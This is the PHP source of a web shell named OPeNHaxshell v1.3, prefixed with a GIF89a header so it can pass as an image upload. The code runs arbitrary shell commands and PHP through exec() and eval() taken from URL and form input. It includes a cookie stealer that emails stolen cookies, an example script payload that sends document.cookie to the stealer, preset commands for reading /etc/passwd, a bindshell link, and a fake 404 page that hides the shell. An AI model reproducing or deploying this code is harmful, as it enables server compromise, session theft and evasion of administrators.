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Code Source Final OPeNHaxshell v1.3

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1 GIF89;a

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41 # [OPeNHax]Tn presents: #
42 # OPeNHaxshell v1.3 final #
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71 ####
72 #To execute commands, simply include ?cmd=___ in the url. #
73 #Ex: #
74 # #
75 #To steal cookies, use ?cookie=___ in the url. #
76 #Ex: <script>document.location.href= #
77 #''+document.cookies</script> #
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104 #0: No protection; anyone can access #
105 #1: User-Agent required #
106 #2: Require IP #
107 #3: Basic Authentication #
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139 #Windows directory handling #
140 # #
141 #The SQL tool is NOT complete. There is currently no editing function#
142 #available. Some time in the future this may be fixed, but for now #
143 #don't complain to me about it #
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177 #pr0be - Beta testing & CSS #
178 #TrinTiTTY - Beta testing #
179 #clorox - Beta testing #
180 #Everyone else at #
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206 #If this script has been found on your server without your approval, #
207 #it would probably be wise to delete it and check your logs. #
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244 */
245 // Configuration
246 $auth = 0;
247 $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
248 $IP = array("",""); // IP Addresses allowed to access shell
249 $email = ""; // E-mail address where cookies will be sent
250 $user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
251 $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
252 // Global Variables
253 $version = "1.3 final";
254 $self = $_SERVER['PHP_SELF'];
255 $soft = $_SERVER["SERVER_SOFTWARE"];
256 $servinf = split("[:]", getenv('HTTP_HOST'));
257 $servip = $servinf[0];
258 $servport = $servinf[1];
259 $uname = php_uname();
260 $curuser = @exec('whoami');
261 $cmd = $_GET['cmd'];
262 $act = $_GET['act'];
263 $cmd = $_GET['cmd'];
264 $cookie = $_GET['cookie'];
265 $f = $_GET['f'];
266 $curdir = cleandir(getcwd());
267 if(!$dir){$dir = $_GET['dir'];}
268 elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
269 elseif($dir && $_SESSION['dir']){$dir = $curdir;}
270 if($dir && $dir != "nullz"){$dir = cleandir($dir);}
271 $contents = $_POST['contents'];
272 $gf = $_POST['gf'];
273 $img = $_GET['img'];
274 session_start();
275 @set_time_limit(5);
276 switch($auth){ // Authentication switcher
277 case 0: break;
278 case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();}
279 case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
280 case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
281 }
283 function userauth(){ // Basic authentication function
284 global $user, $pass;
285 header("WWW-Authenticate: Basic realm='Secure Area'");
286 if(md5($_SERVER["PHP_AUTH_USER"]) != $user ||
md5($_SERVER["PHP_AUTH_PW"] != $pass)){
287 hide();
288 die();
289 }
290 }
291 if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
292 elseif(!$act && $cmd){
293 style();
294 echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
295 $cmd = exec($cmd, $result);
296 foreach($result as $line){echo($line . "\n");}
297 echo("</textarea>");
298 }
299 elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email");
hide();} // Cookie stealer function
300 elseif($act == "view" && $f && $dir){view($f, $dir);}
301 elseif($img){img($img);}
302 elseif($gf){grab($gf);}
303 elseif($dir){files($dir);}
304 else{
305 switch($act){
306 case "phpinfo": phpinfo();break;
307 case "sql": sql();break;
308 case "files": files($dir);break;
309 case "email": email();break;
310 case "cmd": cmd();break;
311 case "upload": upload();break;
312 case "tools": tools();break;
313 case "sqllogin": sqllogin();break;
314 case "sql": sql();break;
315 case "lookup": lookup();break;
316 case "kill": kill();break;
317 case "phpexec": execphp();break;
318 default: main();break;
319 }
320 }
321 function cleandir($d){ // Function to clean up the $dir and $curdir variables
322 $d = realpath($d);
323 $d = str_replace("\\\\", "//", $d);
324 $d = str_replace("////", "//", $d);
325 $d = str_replace("\\", "/", $d);
326 return($d);
327 }
328 function hide(){ // Hiding function
329 global $self, $soft, $servip, $servport;
331 <HTML><HEAD>
332 <TITLE>404 Not Found</TITLE>
333 </HEAD><BODY>
334 <H1>Not Found</H1>
335 The requested URL $self was not found on this server.<P>
336 <P>Additionally, a 404 Not Found
337 error was encountered while trying to use an ErrorDocument to handle the
338 <HR>
339 <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
340 </BODY></HTML>");
341 }
342 function style(){ // Style / header function
343 global $servip,$version;
344 echo("<html>\n
345 <head>\n
346 <title>g00nshell v" . $version . " - " . $servip . "</title>\n
347 <style>\n
348 body { background-color:#000000; color:white; font-family:Verdana; font-
size:11px; }\n
349 h1 { color:white; font-family:Verdana; font-size:11px; }\n
350 h3 { color:white; font-family:Verdana; font-size:11px; }\n
351 input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px
solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
352 textarea { font-family:Courier; font-size:11px; }\n
353 a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-
size:11px; }\n
354 a:hover { color:#7F7F7F; }\n
355 td,th { font-size:12px; vertical-align:middle; }\n
356 th { font-size:13px; }\n
357 table { empty-cells:show;}\n
358 .inf { color:#7F7F7F; }\n
359 </style>\n
360 </head>\n");
361 }
362 function main(){ // Main/menu function
363 global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
364 style();
365 $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP
info', 'phpexec'=>'PHP Execute',
366 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get
Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
367 $capt = array_flip($act);
368 echo("<form method='GET' name='shell'>");
369 echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
370 echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
371 echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
372 echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
373 echo("<div style='display:none' id='info'>");
374 echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
375 echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
376 if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font
377 else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
378 echo("\n<br>\n");
379 if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font
color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
380 else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
381 echo("\n<br>\n");
382 if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " .
383 else{echo("<b>Disabled functions:</b> None");}
384 echo("\n<br>\n");
385 if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font
386 else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
387 echo("</div>");
388 echo("[ <a href='#hax' >= 'block';\">More</a> ] ");
389 echo("[ <a href='#hax' >= 'none';\">Less</a> ]");
390 echo("<center>");
391 echo("<h3 align='center'>Links</h3>");
392 if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a
href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
393 else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
394 echo("</center>");
395 echo("<hr>");
396 echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?
397 echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version .
"</font> ::</pre>");
398 die();
399 }
400 function cmd(){ // Command execution function
401 style();
402 echo("<form name='CMD' method='POST'>");
403 echo("<b>Command:</b><br>");
404 echo("<input name='cmd' type='text' size='50'> ");
405 echo("<select name='precmd'>");
406 $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open
ports'=>'netstat -an',
407 'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
408 'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M
409 'Find passwd files'=>'find / -type f -name passwd');
410 $capt = array_flip($precmd);
411 foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
412 echo("</select><br>\n");
413 echo("<input type='submit' value='Execute'>\n");
414 echo("</form>\n");
415 if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
416 elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
417 else{die();}
418 echo("Results: <br><textarea rows=20 cols=100>");
419 $cmd = @exec($x, $result);
420 foreach($result as $line){echo($line . "\n");}
421 echo("</textarea>");
422 }
423 function execphp(){ // PHP code execution function
424 style();
425 echo("<h4>Execute PHP Code</h4>");
426 echo("<form method='POST'>");
427 echo("<textarea name='phpexec' rows=5 cols=100>");
428 if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
429 echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
430 echo("<input type='submit' value='Execute'>");
431 echo("</form>");
432 if($_POST['phpexec']){
433 echo("<textarea rows=10 cols=100>");
434 eval(stripslashes($_POST['phpexec']));
435 echo("</textarea>");
436 }
437 }
438 function sqllogin(){ // MySQL login function
439 session_start();
440 if($_SESSION['isloggedin'] == "true"){
441 header("Location: ?act=sql");
442 }
443 style();
444 echo("<form method='post' action='?act=sql'>");
445 echo("User:<br><input type='text' name='un' size='30'><br>\n");
446 echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
447 echo("Host:<br><input type='text' name='host' size='30'
448 echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
449 echo("<input type='submit' value='Login'>");
450 echo("</form>");
451 die();
452 }
453 function sql(){ // General SQL Function
454 session_start();
455 if(!$_GET['sqlf']){style();}
456 if($_POST['un'] && $_POST['pw']){;
457 $_SESSION['sql_user'] = $_POST['un'];
458 $_SESSION['sql_password'] = $_POST['pw'];
459 }
460 if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
461 else{$_SESSION['sql_host'] = 'localhost';}
462 if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
463 else{$_SESSION['sql_port'] = '3306';}
464 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
465 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' .
$_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
466 unset($_SESSION['sql_user'], $_SESSION['sql_password'],
$_SESSION['sql_host'], $_SESSION['sql_port']);
467 echo("Invalid credentials<br>\n");
468 die(sqllogin());
469 }
470 else{
471 $_SESSION['isloggedin'] = "true";
472 }
473 }
474 else{
475 die(sqllogin());
476 }
477 if ($_GET['db']){
478 mysql_select_db($_GET['db'], $sqlcon);
479 if($_GET['sqlquery']){
480 $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
481 $num = mysql_num_rows($dat);
482 for($i=0;$i<$num;$i++){
483 echo(mysql_result($dat, $i) . "<br>\n");
484 }
485 }
486 else if($_GET['table'] && !$_GET['sqlf']){
487 echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] .
"&sqlf=ins'>Insert Row</a><br><br>\n");
488 echo("<table border='1'>");
489 $query = "SHOW COLUMNS FROM " . $_GET['table'];
490 $result = mysql_query($query, $sqlcon) or die(mysql_error());
491 $i = 0;

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